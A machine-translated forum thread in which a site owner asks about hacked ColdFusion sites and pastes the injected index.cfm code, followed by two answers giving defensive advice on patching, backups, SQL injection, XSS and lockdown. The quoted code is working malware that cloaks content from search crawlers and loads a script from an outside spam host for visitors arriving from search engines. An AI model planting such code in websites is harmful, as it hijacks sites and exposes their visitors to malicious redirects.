啊啊！Coldfusion网站被黑了

Question

当有人在谷歌搜索时，我们的一些coldfusion网站正被重定向到一个桑树网站。有什么办法可以防止这种情况发生吗？他们一开始是怎么做的？看起来，这段代码被插入到index.cfm中：

<cffunction name="isSpider" returntype="boolean">

    <cfif reFindNoCase("(bot|crawl|spider|slurp|yahoo|sohu-search|lycos|robozil la)", cgi.http_user_agent)>

        <cfreturn true />

    <cfelse>

        <cfreturn false />

    </cfif>

</cffunction>



<cffunction name="isEngine" returntype="boolean">

    <cfif reFindNoCase("(google|bing|aol|search|baidu|yahoo|sogou|soso|live|you dao|so)", cgi.http_referer)>

        <cfreturn true />

    <cfelse>

        <cfreturn false />

    </cfif>

</cffunction>



<cffunction name="isPage" returntype="boolean">

    <cfif reFindNoCase("(index.|default.|main.)", cgi.script_name)>

        <cfreturn true />

    <cfelse>

        <cfreturn false />

    </cfif>

</cffunction>



<cfif isSpider() and isPage()>

    <cfcontent reset="true" />

    <cffile action="read" file="#expandPath("/images/log.gif")#" variable="tpl" />

    <cfoutput>#tpl#</cfoutput>

    <cfabort />

</cfif>



<cfif isEngine() and isPage()>

    <cfcontent reset="true" />

    <script src="http://www.shopsnapbackhatus.com/jie/mulberry.gif" type="text/javascript" charset="utf-8"></script>

    <cfabort />

</cfif>

Answer 1

您没有提到CF的哪个版本，也没有提到IIS或apache等(同样是哪个版本)等等。

攻击可能是通过多个向量来进行的，而且很可能会有某种描述的后门，这取决于他们正在积极地为模板编写代码。即使你找到了切入点，它也不会有任何好处，除非你能说“是的，就是这个”并修补它。你的CF最新吗？

从这里开始：http://hackmycf.com/

然后看看你的模板--我敢打赌里面肯定有一些不应该有的.cfm文件。你有后援吗？比较一下(并且追溯到几个月前--很多入侵尝试都会提前访问，暂时离开，然后开始做一些事情)。

就我个人而言，我会考虑擦除和重新启动是绝对确定的，但即使这样，您也需要检查您重新部署的代码是100%安全的，并且环境已经完全修复，并且您确实找到了最初的原因。

Answer 2

首先，

1. 这可能是由于谷歌或其他搜索引擎，而不是检查你的代码。
2. 从ColdFusion应用当前修补程序。
3. 确保您正在使用所有的查询，因为SQL注入很可能是造成这种情况的原因。
4. 别忘了XSS攻击。如果那些站点接受了公开显示的用户输入，那么首先适当地编码用户输入您的站点。
5. 查看ColdFusion锁定指南(请根据您的coldfusion版本选择) http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf

以上所有内容都使用任何商业或开源工具(我喜欢Zad攻击代理)为您的所有站点执行漏洞测试(如果您正在管理它)。

在进行所有上述操作之前，请检查现有数据库中的杂项代码(通常为javascript标记)并更正它。